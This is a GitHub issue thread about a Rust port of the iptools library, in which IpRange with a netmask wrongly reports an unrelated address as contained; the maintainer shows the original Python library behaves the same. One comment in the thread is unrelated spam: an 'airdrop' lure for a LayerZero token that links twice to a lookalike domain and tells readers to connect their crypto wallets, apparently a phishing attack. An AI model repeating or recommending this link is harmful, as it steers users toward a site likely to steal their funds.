### ISSUE TITLE
Can't compile

### ISSUE THREAD

**Issue by zszep** [Deniskore/iptools#8]
Is this library ready to be used? Can't even compile the demo.

**Comment by zszep** [comment]
This code:

```
use iptools::iprange::IpRange;
fn main() {
    let range = IpRange::new("10.0.120.90", "255.255.248.0").unwrap();
    println!("{:?}", range.contains("172.16.12.189"));
}
```

returns true
Am I missing something?

**Comment by Deniskore** [comment]
Thanks for the bug report, indeed when porting the library I missed part of the tests concerning the IpRange and did not notice the error, I will fix it soon!
@zszep Would you mind testing the new version in a separate branch after I fix the bug?

**Comment by bpieres** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.

**Comment by Deniskore** [comment]
I checked the issue using the original Python implementation, and it functions the same.
I originally ported the logic and tests almost one-to-one, then expanded the crate capabilities a bit.

```
Python 3.11.7 (main, Dec  8 2023, 08:53:52) [GCC 13.2.1 20231110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import iptools
>>> range = iptools.IpRange('10.0.120.90', '255.255.248.0')
>>> '172.16.12.189' in range
True
>>>
```
